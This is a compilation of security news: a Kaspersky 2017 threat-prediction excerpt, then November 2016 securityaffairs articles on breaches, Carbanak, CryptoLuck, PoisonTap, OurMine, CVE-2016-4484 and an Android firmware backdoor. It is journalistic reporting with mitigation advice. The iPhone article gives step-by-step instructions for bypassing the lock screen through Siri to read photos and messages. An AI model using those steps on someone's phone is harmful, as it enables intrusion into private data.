The topic of False Flags and PsyOps are a particular favorite of ours and to no surprise, we foresee the expansion of several trends in that vein…

Information warfare

The creation of fake outlets for targeted dumps and extortion was pioneered by threat actors like Lazarus and Sofacy. After their somewhat successful and highly notorious use in the past few months, we expect information warfare operations to increase in popularity for the sake of opinion manipulation and overall chaos around popular processes. Threat actors interested in dumping hacked data have little to lose from crafting a narrative through an established or fabricated hacktivist group; diverting attention from the attack itself to the contents of their revelations.

Forecast for 2017: ‘script kiddie’ extortionists compromise the idea of paying ransom to retrieve data

The true danger at that point is not that of hacking, or the invasion of privacy, but rather that as journalists and concerned citizens become accustomed to accepting dumped data as newsworthy facts, they open the door to more cunning threat actors seeking to manipulate the outcome by means of data manipulation or omission. Vulnerability to these information warfare operations is at an all-time high and we hope discernment will prevail as the technique is adopted by more players (or by the same players with more throwaway masks).

Kaspersky Security Bulletin. Predictions for 2017

The promise of deterrence

As cyberattacks come to play a greater role in international relations, attribution will become a central issue in determining the course of geopolitical overtures. Governmental institutions have some difficult deliberating ahead to determine what standard of attribution will prove enough for demarches or public indictments. As precise attribution is almost impossible with the fragmented visibility of different public and private institutions, it may be the case that ‘loose attribution’ will be considered good enough for these. While advising extreme caution is important, we must also keep in mind that there is a very real need for consequences to enter the space of cyberattacks. Our bigger issue is making sure that retaliation doesn’t engender further problems as cunning threat actors outsmart those seeking to do attribution in the first place. We must also keep in mind that as retaliation and consequences become more likely, we’ll see the abuse of open-source and commercial malware begin to increase sharply, with tools like Cobalt Strike and Metasploit providing a cover of plausible deniability that doesn’t exist with closed-source proprietary malware.

Kaspersky Security Bulletin. Predictions for 2017

Doubling-down on False Flags

While the examples reported in the False Flags report included in-the-wild cases of APTs employing false flag elements, no true pure false flag operation has been witnessed at this time. By that we mean an operation by Threat Actor-A carefully and entirely crafted in the style and with the resources of another, ‘Threat Actor-B’, with the intent of inciting tertiary retaliation by the victim against the blameless Threat Actor-B. While it’s entirely possible that researchers have simply not caught onto this already happening, these sorts of operations won’t make sense until retribution for cyberattacks becomes a de facto effect. As retaliation (be it overtures, sanctions, or retaliatory CNE) becomes more common and impulsive, expect true false flag operations to enter the picture.

Forecast for 2017: lack of security for the Internet of Things will turn it into an ‘Internet of Bricks’

As this becomes the case, we can expect false flags to be worth even greater investment, perhaps even inciting the dumping of infrastructure or even jealously guarded proprietary toolkits for mass use. In this way, cunning threat actors may cause a momentary overwhelming confusion of researchers and defenders alike, as script kiddies, hacktivists, and cybercriminals are suddenly capable of operating with the proprietary tools of an advanced threat actor, thus providing a cover of anonymity in a mass of attacks and partially crippling the attribution capabilities of an enforcing body.

Kaspersky Security Bulletin. Predictions for 2017

What privacy?

Pulling the veil

There’s great value to be found in removing what vestiges of anonymity remain in cyberspace, whether for the sake of advertisers or spies. For the former, tracking with persistent cookies has proven a valuable technique. This is likely to expand further and be combined with widgets and other innocuous additions to common websites that allow companies to track individual users as they make their way beyond their particular domains, and thus compile a cohesive view of their browsing habits (more on this below).

Forecast for 2017: the question “Who is your firewall working for?” will become increasingly relevant

In other parts of the world, the targeting of activists and tracking of social media activities that ‘incite instability’ will continue to inspire surprising sophistication, as deep pockets continue to stumble into curiously well-placed, unheard of companies with novelties for tracking dissidents and activists through the depth and breadth of the internet. These activities tend to have a great interest in the social networking tendencies of entire geographic regions and how they’re affected by dissident voices. Perhaps we’ll even see an actor so daring as to break into a social network for a goldmine of PII and incriminating information.

Kaspersky Security Bulletin. Predictions for 2017

The espionage ad network

No pervasive technology is more capable of enabling truly targeted attacks than ad networks. Their placement is already entirely financially motivated and there is little or no regulation, as evidenced by recurring malvertising attacks on major sites. By their very nature, ad networks provide excellent target profiling through a combination of IPs, browser fingerprinting, and browsing interest and login selectivity. This kind of user data allows a discriminate attacker to selectively inject or redirect specific victims to their payloads and thus largely avoid collateral infections and the persistent availability of payloads that tend to pique the interest of security researchers. As such, we expect the most advanced cyberespionage actors to find the creation or co-opting of an ad network to be a small investment for sizable operational returns, hitting their targets while protecting their latest toolkits.

Forecast for 2017: rapid evolution of false-flag cybercriminal operations

Kaspersky Security Bulletin. Predictions for 2017

The rise of the vigilante hacker

Following his indiscriminate release of the HackingTeam dump in 2015, the mysterious Phineas Fisher released his guide for aspiring hackers to take down unjust organizations and shady companies. This speaks to a latent sentiment that the asymmetrical power of the vigilante hacker is a force for good, despite the fact that the HackingTeam dump provided live zero-days to active APT teams and perhaps even encouragement for new and eager customers. As the conspiratorial rhetoric increases around this election cycle, fuelled by the belief that data leaks and dumps are the way to tip the balance of information asymmetry, more will enter the space of vigilante hacking for data dumps and orchestrated leaks against vulnerable organizations.

Forecast for 2017: cybercriminals increasingly turn to social and advertising networks for espionage

Kapustkiy breached an Italian Government website, exposing 9,000 of 45,000 records
19.11.2016 securityaffairs Hacking

Hacker Kapustkiy breached into an Italian Government website (Dipartimento della Funzione Pubblica) exposing 9,000 users of 45,000.
A few days ago I was contacted by a young hacker that breached Indian embassies across the worlds, he goes online with the moniker Kapustkiy.

Kapustkiy is a pentester that is targeting organizations and embassies across the world. Recently he breached the Paraguay Embassy of Taiwan (, while a few days ago the hacker and his friend Kasimierz (@Kasimierz_) hacked the Indian Embassies in Switzerland, Mali, Romania, Italy, Malawi, and Libya. Kapustkiy and his friend Kasimierz (@Kasimierz_).

Indian authorities have issued a public statement to thank the young hacker for exposing the vulnerabilities in their websites.

“Thank you for your advice,” said Sanjay Kumar Verma, Joint Secretary, eGovernance and Information Technology. “We are fixing codes one by one. Your help in probing websites of various Indian embassies is a great help.”

Other victims are two subdomains of Virginia University & Sub domain of University of Wisconsin ( ) and another embassy, the Indian Embassy in New York ( )

Yesterday he contacted me because he hacked a website belonging to the Italian Government. The database accessed by the hacker contains roughly 45,000 users, including login credentials.

Kapustkiy told me he has exploited an SQLi flaw in the ‘Dipartimento della Funzione Pubblica’ website to gain access to the database. He shared a Pastebin link containing the reference to an excel file containing the user records in the database.

The excel includes email addresses of the users, used as username, and encrypted passwords.

The link points to an excel file containing only 9,000 records, the young hacker published only a small portion of overall data in order to give Italian experts time to solve the problem.

Kapustkiy first contacted the site’s administrators to report the issue but without reply, only after the news went public someone has put the site in maintenance mode.


“I did not get any response from the administrators. I hope they will improve their security,” he told me.

At the time I was writing the excel file is still online.

Are you an iPhone user? Your call history is uploaded on iCloud too
18.11.2016 securityaffairs iOS

According to Elcomsoft, iPhone and iPad automatically send call history to Apple when iCloud is enabled, the company stores the data for up to four months.
According to the digital forensics firm Elcomsoft, Apple mobile devices automatically send call history to the company when the iCloud is enabled, it also stores the data for up to four months.

The only way to prevent such activity is to completely disable the cloud synchronization feature.

“iCloud sync is everywhere. Your contacts and calendars, system backups and photos can be stored in the cloud on Apple servers. This time, we discovered that yet another piece of data is stored in the cloud for no apparent reason. Using an iPhone and have an active iCloud account? Your calls will sync with iCloud whether you want it or not. In fact, most users we’ve heard from don’t want this “feature”, yet Apple has no official way to turn off this behavior other than telling people “not using the same Apple ID on different devices”. What’s up with that? Let’s try to find out.” reads the analysis published by Elcomsoft.

Elcomsoft tools could allow determining what personal data is synchronized with Apple servers and how to prevent it.

When the iCloud feature is enabled, Apple mobile devices automatically collect and send back to the company private information such as call history, phone numbers, phone call metadata (i.e. Length of calls).

The iPhone also sends information collected from other third-party VoOP applications, including Facebook Messenger, Viber, WhatsApp, and Skype.


Security experts highlighted the low level of protection of users’ data in Apple iCloud, that could be easily accessed by law enforcement.

“So far, we had no reasons to doubt this policy. However, we’ve seen Apple moving more and more data into the cloud. iCloud data (backups, call logs, contacts and so on) is very loosely protected, allowing Apple itself or any third party with access to proper credentials extracting this information. Information stored in Apple iCloud is of course available to law enforcement.” continues Elcomsoft .

Even logs are sent in real time to Apple when iCloud Drive is enabled. If users want to stop sharing their logs with Apple need to disable iCloud Drive completely, an operation that has an impact on many applications.

“Syncing call logs happens almost in real time, though sometimes only in a few hours,” says Elcomsoft CEO Vladimir Katalov. “But all you need to have is just iCloud Drive enabled, and there is no way to turn that syncing off, apart from just disabling iCloud Drive completely. In that case, many applications will stop working or lose iCloud-related features completely.”

Apple, of course, defends its iCloud Sync feature ensuring that customers’ data is encrypted and protected with a two-factor authentication mechanism.

“We offer call history syncing as a convenience to our customers so that they can return calls from any of their devices. Apple is deeply committed to safeguarding our customers’ data. That is why we give our customers the ability to keep their data private. Device data is encrypted with a user’s passcode, and access to iCloud data including backups requires the user’s Apple ID and password. Apple recommends all customers select strong passwords and use two-factor authentication.” is the official statement from the company.

Three Mobile cyber data breach, six million customers’ private data at risk
18.11.2016 securityaffairs Crime

The UK carrier Three Mobile confirmed a major cyber security breach which could have exposed the personal data of millions of customers.
Bad news for the UK carrier Three Mobile, cyber criminals have broken into a company database containing customer personal details, details of possibly six million customers exposed.

The news was reported by many media outlets that cited the National Crime Agency (NCA) and the Three Mobile company.

“Three Mobile cyber hack: six million customers’ private information at risk after employee login used to access database ” reports The Telegraph.

According to The Telegraph, Three Mobile admitted that hackers have accessed its customer upgrade database by using an employee login.

“In order to commit this type of upgrade handset fraud, the perpetrators used authorised logins to Three’s upgrade system.” said a company spokesman.

“This upgrade system does not include any customer payment, card information or bank account information,” the spokesman said.

“Sources familiar with the incident told the Telegraph that the private information of two thirds of the company’s nine million customers could be at risk” continues The Telegraph.

three mobile uk-data-breach

Fortunately, payment data (i.e. Credit card data, bank account data) were not exposed, but the hackers did have access to customer names, addresses, phone numbers, and dates of birth.

Investigators believe the hackers have broken into the Three Mobile database to find customers eligible for handset updates and then place orders on their behalf for the new smartphones that were redirected to them and then resold in a parallel market.

This kind of scam is increasing, crooks exploit handset upgrades being ordered in order to steal the mobile devices while in transit.

A Three Mobile spokesman confirmed a significant increase in attempted phone fraud over the past four weeks, adding that that increase also includes burglaries of Three retail stores.

The NCA has already arrested three men, two on computer misuse allegations and one on suspicion of attempting to pervert the course of justice.

“The investigation is ongoing and we have taken a number of steps to further strengthen our controls,” added the company spokesman.

The Three Mobile data breach follows the Talk Talk occurred in October 2015 when the details of more than 150,000 customers were stolen including the bank account details of around 15,000.

The company suffered a significant impact, it lost 95,000 subscribers as a result of the attack, which cost it £60million.

Drupal releases security updates to fix four vulnerabilities in versions 7, 8

18.11.2016 securityaffairs Vulnerebility

Drupal developers have released updates for versions 7 and 8 that fix security issues which could expose websites to cyber attacks.
The Drupal development team has released security updates for versions 7 and 8. The updates fix security vulnerabilities that could expose websites running on the popular CMS and data they manage to security risks, including information disclosure, cache poisoning, redirection to third-party sites and a denial-of-service (DoS).

The new releases, Drupal 7.52 and Drupal 8.2.3, fix four vulnerabilities rated “moderately critical” and “less critical.”

Inconsistent name for term access query (Less critical – Drupal 7 and 8).
Incorrect cache context on password reset page (Less critical – Drupal 8).
Confirmation forms allow external URLs to be injected (Moderately critical – Drupal 7).
Denial of service via transliterate mechanism (Moderately critical – Drupal 8).
In one attack scenario, ill-intentioned could cause a DoS condition by simply sending specially crafted URLs via the transliteration mechanism that is used to replace certain characters, such as the ones used in Russian and Greek, with universally displayable US-ASCII characters.

“A specially crafted URL can cause a denial of service via the transliterate mechanism.” reads the security advisory.

In the case of the second flaw ranked as “Moderately critical”, under certain circumstances, attackers use a specially crafted URL to a confirmation form that would trick users into being redirected to a 3rd party website after interacting with the form. In this way, the users could be exposed to a wide range of social engineering attacks.


A Less critical flaw resides in the user password reset form that does not specify a proper cache context, a circumstance that which can lead to cache poisoning and unwanted content on the page.

The last “less critical” issue affects both Drupal 7 and 8 is related to inconsistent names for term access queries. The flaw can lead to information on taxonomy terms being disclosed to unprivileged users.

It is very important for websites running on Drupal to apply the security updates to avoid being hacked. In June 2016, experts from Sucuri firm reported that more than 19 months after the public disclosure of the CVE-2014-3704 many websites were still exposed to cyber attacks leveraging the flaw. For this reason, experts called the flaw Drupalgeddon.

How to Bypass iPhone Passcode and access personal data on the device
18.11.2016 securityaffairs iOS

A new flaw allows to bypass the iPhone Passcode protection, even when Touch ID is properly configured, and access photos and messages stored on the device.
The use passcode for the protection of users’ data on iPhone Smartphone doesn’t protect users from the possibility that local ill-intentioned will access their data.

A new flaw allows to bypass the passcode protection, even when Touch ID is properly configured, and access photos and messages stored on the device.

The critical vulnerability affects the iOS 8 and newer versions of the Apple OS, including 10.2 beta 3. An attacker can bypass iPhone passcode and gain access to personal data on the device by exploiting the Apple personal assistant Siri.

The security issue has been discovered by EverythingApplePro and iDeviceHelps who made public it and published a video PoC of the hack.

The attacker needs the phone number of the target iPhone and access to the phone for a few minutes. If he doesn’t know the phone number, well Siri will reveal it with a simple query, “Who am I?”

When the attacker has the number of the device he needs to follow simple steps in order to bypass the iPhone passcode protection.
Once you got the phone number, follow these simple steps to read personal data on the Smartphone, including messages and photos.
Call on target’s phone number, it is also works making a FaceTime call.
The target iPhone screen will show a message icon, just click on ‘Message icon’ and then ‘Custom Message’ to go to the New Message screen, in this way, the user can type a reply.
Activate Siri by long-pressing the Home button and say “Turn on Voice Over,” and Siri will do it.
Go back to the message screen and double tap the bar where the user is required to enter the caller’s name and then hold, while immediately click on the keyboard. This may not produce the expected effect in the first time, so repeat the action until a slide-in effect appears on the iPhone’s screen above the keyboard.
Ask Siri to “Turn off VoiceOver,” come back to messages and simply type in the first letter of a caller’s name in the top bar, tap ⓘ icon next to it, and then add a new contact.
Select add photo and choose a photo, you will get the access to the entire photo gallery even if the device is locked.
Select any contact on the iPhone to visualize all previous conversations of the target with this specific contact.
iPhone Passcode

Waiting for a fix, it is possible to protect the user’s device by disabling Siri on the lock screen, this means that the personal assistant will be accessible only after providing the iPhone passcode or the fingerprint.

Go to the Settings → Touch ID & Passcode and Disable Siri on the Lockscreen by toggling the switch to disable.

Another possibility consists in removing Photos access from Siri in this way:

Go to Settings → Privacy → Photos and then prevent Siri from accessing pictures.

Experts believe Apple will fix the issue in the next version of iOS 10.2.

The Carbanak gang is now targeting the hospitality industry
18.11.2016 securityaffairs Virus

The notorious Carbanak cybercrime gang is now changing strategy and it is targeting the hospitality and restaurant industries.
The notorious Carbanak cybercrime gang that allegedly stole $1 billion from financial institutions worldwide is now changing strategy and target and it is targeting the hospitality and restaurant industries.

“In the last month Trustwave was engaged by two separate hospitality clients, and one restaurant chain for investigations by an unknown attacker or attackers. The modus operandi for all three investigations were very similar and appear to be a new Carbanak gang attack methodology, focused on the hospitality industry. ” reported Trustwave.

According to security experts at Trustwave, the Carbanak gang in the last week started adopting new techniques and malware. The hackers launched a spear-phishing campaign on people in the industry in the attempt to trick victims into reading emails with malicious macro-laced documents.

In the attacks observed by the security firm, the attacker called the customer contact line saying that they are facing problems using their online services and requested to send their information to the agent via email. The attacker stayed on the line until the agent opened the attachment contained in the email, then he hung up when the victims have opened the malicious message.

“The email attachment was a malicious Word Document that contained an encoded .VBS script capable of stealing system information, desktop screenshots, and to download additional malware.”reads the analysis of the Carbanak attack. “The malicious VB Script will use macros to search for instances of Microsoft Word running on the system, if found, it will clear the existing text and replace it with the following text.”


The hackers first download a malware used as a reconnaissance tool in a first stage of the attack, it is able to download popular hacking tools, including Nmap, FreeRDP, NCat and NPing.

Later it also downloads additional payloads that allow to carry on the next stage of the attack.

The final target is to steal sensitive information and credit card data scraped from the memory of the infected machines, including point-of-sale systems with a recompiled version of the Carbanak malware that is hard to detect.

“This malware may steal credit card data, as well as screen captures, keylogger information, email addresses from the PST file, enable RDP or VNC sessions, or to obtain additional system information.”

This malware establishes a backdoor on the victim’s machine in order to gain full control on it. It communicates via an encrypted tunnel on port 443 with the following IP addresses:
All exfiltrated information is encrypted with base64+RC2 and sent via HTTP POST messages.

The new campaign started about six weeks ago, Trustwave also published a list of fresh IoCs (indicators of compromise) that could help administrators and security experts to detect the threat.

“the persistence, professionalism, and pervasiveness of this campaign is at a level rarely seen by Trustwave. The malware used is very multifaceted and still not caught by most (if any) antivirus engines. The social engineering is highly targeted, conducted via direct phone calls by threat actors with excellent English skills. The network reconnaissance and lateral movement is rapid and highly effective. Finally, the data exfiltration methodology is stealthy and efficient.” reads the conclusion of the Trustwave report.

The fact that a criminal gang like Carbanak is changing tactic targeting the healthcare industry represent a clear indicator of the profitability of the industry for crooks.

It’s not the first time that criminal organizations target the hospitality sector,

In November 2014 Kaspersky spotted the activity of a group of cyber criminals dubbed Darkhotel that was targeting executives traveling across Asia through hotel internet networks.

The DarkHotel campaign was ongoing for at least four years while targeting selected corporate executives traveling abroad. According to the experts, threat actors aimed to steal sensitive data from the victims while they were in luxury hotels.
The attackers appear high skilled professionals that were exfiltrate data of interest with a surgical precision and deleting any trace of their activity.

CryptoLuck Ransomware spread through the RIG-E Exploit Kit
18.11.2016 securityaffairs Virus

CryptoLuck ransomware is a new strain of malware discovered by the researcher Kafeine, that is being distributed via the RIG-E exploit kit.
The notorious researcher Kafeine has spotted a new strain of ransomware dubbed CryptoLuck. The malware leverages DLL hijacking and exploits the legitimate GoogleUpdate.exe executable to infect computers.

The ransomware appends the .[victim_id]_luck extension to the encrypted files, it is able to lock hundreds of file extensions. It skips files that contain specific strings: Windows, Program Files, Program Files (x86), ProgramData, AppData, Application Data, Temporary Internet Files, Temp, Games, nvidia, intel, $Recycle.Bin, and Cookies.

The malware asks victims to pay a 2.1 Bitcoin (around $1,500) ransom within 72 hours in order to rescue the encrypted files.

The CryptoLuck ransomware is delivered through the RIG-Empire (RIG-E) exploit kit. Crooks leverages malvertising campaigns through adult websites, but likely they will adopt other infection vectors.

The ransomware is spread using a RAR SFX file which contains the crp.cfg, GoogleUpdate.exe, and goopdata.dll files, along with instructions to extract these into the %AppData%\76ff folder and to silently execute GoogleUpdate.exe.

The advantage for abusing the GoogleUpdate.exe is that is a legitimate Google program that is signed by Google.

The authors of the CryptoLuck ransomware have included a malicious goopdate.dll file in the package for the legitimate program to load into memory.

“When the GoogleUpdate.exe program is run, it will look for a DLL file called goopdate.dll file and load it. The problem is that it will first look for this file in the same folder that the GoogleUpdate.exe resides in. This allows a malware developer to create their own malicious goopdate.dll file and have it loaded by GoogleUpdate.” reads the analysis published by Lawrence Abrams from the

The CryptoLuck ransomware implements mechanisms to avoid analysis from security firms. It is able to determine if it is running in a virtual machine, and in this case, it halts itself. Once executed it scans all mounted drives and unmapped network shares for files to encrypt.

The ransomware uses an AES-256 encryption with a unique AES encryption key for each of file to encrypt. The key is encrypted with an embedded public RSA key and the resulting encrypted AES key is embedded in the encrypted file.

When the ransomware has completed the encryption of the files, it displays a ransom note that contains the instructions for the payment of the ransom.


PoisonTap hacking tool can compromise any password-protected PC
18.11.2016 securityaffairs Exploit

Samy Kamkar has created a new hacking tool, dubbed PoisonTap, to easily hack into a password-protected computer.
PoisonTap is a new hacking tool that could be used by attackers to easily access to a password-protected computer, hijack all its Internet traffic, and also install backdoors.

Try to imagine who is the hacker behind this new tool?

Samy Kamkar, of course.

YouTube ‎@YouTube
Samy Kamkar ✔ @samykamkar
I've released PoisonTap; attacks *locked* machines, siphons cookies, exposes router & backdoors browser w/RasPi&Node
12:58 - 16 Nov 2016 · West Hollywood, CA
745 745 Re 905 905 Mi piace
Samy Kamkar (@SamyKamkar) is one of the most prolific experts that periodically presents to the security community his astonishing creations, such as MagSpoof, the Combo Breaker, OpenSesame and KeySweeper

PoisonTap is a $5 Raspberry Pi Zero runs some Node.js code that the expert has publicly released. Once the attacker connects the hacking tool to a Windows or Mac computer via USB, it starts loading the exploits needed to hack the machine.

Samy Kamkar explained that the device is able to compromise machines, even if they are locked.

“[PoisonTap] produces a cascading effect by exploiting the existing trust in various mechanisms of a machine and network, including USB, DHCP, DNS, and HTTP, to produce a snowball effect of information exfiltration, network access and installation of semi-permanent backdoors,” explained Kamkar.


Once the hacking tool is recognized by the host machine (Windows and OS X) it is loaded as a low-priority network device that emulates an Ethernet device over USB.

The machine sends a DHCP request to the tool that in response tells it that the entire IPv4 address space is part of PoisonTap’s local network. In this way, the entire traffic it routed through the PoisonTap device before reaching the legitimate gateway to the Internet. With this trick, the hacking tool is able to steal HTTP cookies and sessions for the Alexa top 1 million websites from the victim’s browser.


Once the attacker has collected the cookies he is able to take over the victim’s online accounts, also bypassing two-factor authentication (2FA).

“As long as a browser is running on the machine and an HTTP request is made automatically – such as through an ad, AJAX request, or other dynamic web content, which happens on most sites, even when the browser is entirely in the background, PoisonTap intercepts the request and responds with attack code that’s interpreted by the browser,” Kamkar explains in the video.

The attacker could also use the device to install web-based backdoors for hundreds of thousands of domains, and establish a remote access channel to the victim’s router.

Since PoisonTap is able to bypass HTTPS protection if the “secure” cookie flag and HSTS are not enabled.

The device is powerful, Kamkar explained that it can also bypass many other security mechanisms, including same-origin policy (SOP), HttpOnly cookies, X-Frame-Options HTTP response headers, DNS pinning and cross-origin resource sharing (CORS).

Once the machine is compromised and the backdoor is established, the attacker is able to control the target even after the hacking tool is unplugged.

“Whenever the websocket is open, the attacker can remotely send commands to the victim and force their browser to execute JavaScript code,” added Kamkar.

Below the video PoS published by Kamkar.

In order to mitigate such kind of attacks on a server side operators can properly implement HTTPS and use HSTS to prevent downgrade attacks.

Below the measures suggested by Samy for Server-Side Security:

Use HTTPS exclusively, at the very least for authentication and authenticated content
Honestly, you should use HTTPS exclusively and always redirect HTTP content to HTTPS, preventing a user being tricked into providing credentials or other PII over HTTP
Ensure Secure flag is enabled on cookies, preventing HTTPS cookies from leaking over HTTP
When loading remote Javascript resources, use the Subresource Integrity script tag attribute
Use HSTS to prevent HTTPS downgrade attacks

OurMine hackers hacked Mark Zuckerberg’s online accounts for the second time
18.11.2016 securityaffairs Hacking

For the second time this year, the hacker group OurMine breached one of the online accounts of the Facebook CEO Mark Zuckerberg.
For the second time, this year hackers seems to have breached the Facebook CEO Mark Zuckerberg. The notorious hacking group known as OurMine has claimed credit for hacking Mark Zuckerberg’s online accounts.

The news was reported by Zack Whittaker from Zero Day who was contacted by the notorious group of hackers. OurMine told Whittaker they had hacked the Zuckerberg’s Pinterest account, the hacker changed the tagline and published the group’s web address. At the time I was writing the situation has been restored to the normal.

“Don’t worry, we are just testing your security.” displayed the defaced Zuckerberg’s Pinterest account.

The group did not provide further information about the attack, they only clarified to haven’t used data from leaked databases.

The group admitted having exploited a flaw in Pinterest but avoided to reveal it.

“When pressed, the group said that it has “a exploit on Pinterest” but didn’t say how. The last time it said that it had exploited a platform, it turned out to be a fake.” wrote Whittaker.

The OurMine hacker group targeted many other high-profile users, the list of victims is very long and include names like Mark Zuckerberg, Twitter co-founder Evan Williams, David Guetta Daniel Ek, former Twitter CEO Dick Costolo, the CEO and founder of Spotify, Google CEO Sundar Pichai, and many others.

Which is the motivation?

It seems that the OurMine group is linked to a Security Firm that is trying to obtain notoriety from the attacks and is offering its services to the targets, that evidently need them to avoid further incidents.

OurMine hackers

One of the messages posted by the group states:

“We are just testing people security (sic), we never change their passwords, we did it because there is other hackers can hack them and change everything.”

Whittaker revealed that hackers also emailed his Zuckerberg’s username, and his password for his Twitter account. The OurMine group confirmed that Zuckerberg had enabled two-factor authentication after they hacked it for the first time.

The hackers disclosed more information, for example, they said the phone number associated with the account ended in “86”, while the current Twitter password was Zuckerberg’s former personal Gmail password, which was changed six months ago.

CVE-2016-4484 Hold down the Enter key for 70 sec to gain a Linux Root shell
18.11.2016 securityaffairs Vulnerebility

The CVE-2016-4484 vulnerability can be exploited to gain a Linux Root shell by simply pressing the Enter Key for 70 Seconds.
It could be quite easy to bypass the authentication procedures on some Linux systems just by holding down the Enter key for around 70 seconds. In this way, it is possible to open a shell with root privileges and gain complete remote control over encrypted Linux machine.The problem is related to a security vulnerability, tracked as CVE-2016-4484, in the implementation of the Cryptsetup utility.

The CVE-2016-4484 was discovered by the Spanish security researchers Hector Marco and Ismael Ripoll. The principal Linux distributions, including Debian, Ubuntu, Fedora, Red Hat Enterprise Linux (RHEL), and SUSE Linux Enterprise Server (SLES) are vulnerable. Millions of users are at risk.

“A vulnerability in Cryptsetup, concretely in the scripts that unlock the system partition when the partition is ciphered using LUKS (Linux Unified Key Setup). The disclosure of this vulnerability was presented as part of our talk “Abusing LUKS to Hack the System” in the DeepSec 2016 security conference, Vienna.” Wrote the researchers in a security advisory.

“This vulnerability allows to obtain a root initramfs shell on affected systems. The vulnerability is very reliable because it does not depend on specific systems or configurations. Attackers can copy, modify or destroy the hard disc as well as set up the network to exfiltrate data. This vulnerability is especially serious in environments like libraries, ATMs, airport machines, labs, etc, where the whole boot process is protected (password in BIOS and GRUB) and we only have a keyboard or/and a mouse.”

The Cryptsetup is a utility used to conveniently setup disk encryption based on the DMCrypt kernel module.These include plain dm-crypt volumes, LUKS volumes, loop-AES and TrueCrypt (including VeraCrypt extension) format.

The bug affects the way the Cryptsetup utility handles decryption password process when a system boots up, which lets a user retry the password multiple times.

Even if the user has exhausted all 93 password attempts, the user displays a shell that has root privileges.

Simply holding down the Enter key for more or less 70 seconds user will gain access to a root initial RAM file system (aka initramfs) shell that gives him full access to local file system and could be exploited to exfiltrate data via the network. The bad news is that the flaw is also remotely exploitable by attackers, this is the case of cloud-based services running on Linux that could be targeted without having ‘physical access.’

The experts highlighted the fact that anyway the attacker is not able to access to to the contents of the encrypted drive.

Below the list of operations allowed to the attacker:

Elevation of privilege: Since the boot partition is typically not encrypted:
It can be used to store an executable file with the bit SetUID enabled. Which can later be used to escalate privileges by a local user.
If the boot is not secured, then it would be possible to replace the kernel and the initrd image.
Information disclosure: It is possible to access all the disks. Although the system partition is encrypted it can be copied to an external device, where it can be later be brute forced. Obviously, it is possible to access to non-encrypted information in other devices.
Denial of service: The attacker can delete the information on all the disks.
In order to fix the problem, you need to check for the availability of a patch. In case there is no patch, the problem could be solved by modifying the cryptroot file to limit the number of password attempts and stop the boot sequence when this number is reached.

CVE-2016-4484 cryptsetup-manual-fix

You can add the following commands to your boot configuration:

sed -i 's/GRUB_CMDLINE_LINUX_DEFAULT="/GRUB_CMDLINE_LINUX_DEFAULT="panic=5 /' /etc/default/grub grub-install

Hacker behind Spamhaus attack will not spend any time in the jail
18.11.2016 securityaffairs Crime

The Dutch hacker Sven Olaf Kamphuis who was charged for Spamhaus attack, a massive DDoS attack, will not spend any time in the jail.
The Dutch hacker Sven Olaf Kamphuis who was charged for the massive DDoS attack against the anti-spam group Spamhaus, the biggest attack of ever, escaped prison Monday.

The Spamhaus Project is an international nonprofit organization that monitors spam and related cyber threats.

It sells information on threat actors to Internet Service Providers, including blacklists of those malicious websites.

ISPs use these blacklists to filter spam, Kamphuis’s provider Cyber Bunker was included in these lists, this means that Spamhaus blocked its customers. In revenge, Kamphuis launched the attack against the Spamhaus.

Spamhaus blamed CyberBunker for the 2013 DDoS attack, which came just after it blacklisted CyberBunker.

cyberbunker blacklisted Spamhaus attack

Sven Olaf Kamphuis was arrested in April 2013 by Spanish law enforcement in Barcelona, following a European arrest warrant for the attack against Spamhaus that peaked at over 300 Gbps.

Kamphuis was sentenced to a total of 240 days in jail because most of his term was suspended.

He served 55 days in jail while waiting for the extradition from Spain in 2013 to the Netherlands. Then, the judges suspended the remaining 185 days sentence.

According to the court, the DDoS attacks on Spamhaus company put “the proper functioning of the Internet at risk and thus the interests of many individuals, businesses, and institutions,”

“That attack was on the network of the US Internet company Spamhaus. K. was arrested in Spain in 2013 and extradited to the Netherlands. He had 55 days detained in custody, so he does not go back to jail.” reported the Dutch media.

Kamphuis was sentenced for taking part in a global cybercrime ring that hacked machines worldwide.

In July 2015, another hacker, the British teenager (aka Narko) Seth Nolan Mcdonagh has been sentenced to 240 hours of community service for the attack.

Kamphuis’ lawyers sustained Mcdonagh was the unique responsible for the Spamhaus attack.

Kamphuis will not spend any time in the jail.

Experts spotted a secret backdoor in Android phones that sends data to China
18.11.2016 securityaffairs Android

Experts at Kryptowire discovered a mobile phone firmware that transmitted personally identifiable information without user consent due to a backdoor.
Security experts from Kryptowire firm have discovered a backdoor in the firmware installed on low-cost Android phones. The backdoor affects mobile phones from BLU Products that are available for sale on both Amazon and Best Buy.

The backdoor resides in the commercial Firmware Over The Air (FOTA) update software that is installed on BLU Android devices provided as a service to BLU by AdUps.

The impact is worrisome if we consider that the backdoor could be exploited by threat actors to collect personal data about the phones and the owners’ activities and send it back to servers located in China. The servers appear to be owned by a firmware update software provider, the Shanghai AdUps Technologies.

“Kryptowire has identified several models of Android mobile devices that contained firmware that collected sensitive personal data about their users and transmitted this sensitive data to third-party servers without disclosure or the users’ consent. These devices were available through major US-based online retailers (Amazon, BestBuy, for example) and included popular smartphones such as the BLU R1 HD.” reads the analysis published by Kryptowire.”These devices actively transmitted user and device information including the full-body of text messages, contact lists, call history with full telephone numbers, unique device identifiers including the International Mobile Subscriber Identity (IMSI) and the International Mobile Equipment Identity (IMEI). “


Experts discovered that the data gathered by the backdoor include phone number, location data, the content of text messages, calls made, and applications installed and used.

Why such kind of backdoor?

It seems that the Shanghai AdUps Technologies firm has inserted a backdoor in its firmware for advertising and commercial purposes, its main goal is to collect data on users’ behavior.

The company also provides firmware updates for Chinese tech giants, including Huawei and ZTE, accounting for more than 700 million devices worldwide.

A legal representative of the company told The New York Times that the company is not gathering information for the Government of Beijing.

“This is a private company that made a mistake,” said Lily Lim, a lawyer who represents Adups.

“For many years, the Chinese government has used a variety of methods to filter and track internet use and monitor online conversations. It requires technology companies that operate in China to follow strict rules. Ms. Lim said Adups was not affiliated with the Chinese government.” reported the NYT.

Kryptowire who discovered the backdoor reported it to Google, BLU, AdUps, and Amazon.

Ransomware: How to recover your encrypted files, the last guide.
18.11.2016 securityaffairs Virus

In this guide, we will explain how to recover encrypted files focusing on the Data-Locker Ransomware that targets the Windows operating system.
Why my system asks me to pay?

A ransomware is a computer malware that limits the access of a system and ask for a ransom in order to remove that restriction.
The restriction applied to the system can change in the time and can be realized in various ways.
Based on the restriction applied on the system we can recognize two kinds of ransomware based on their behaviors:

Pc-Locker Ransomware:
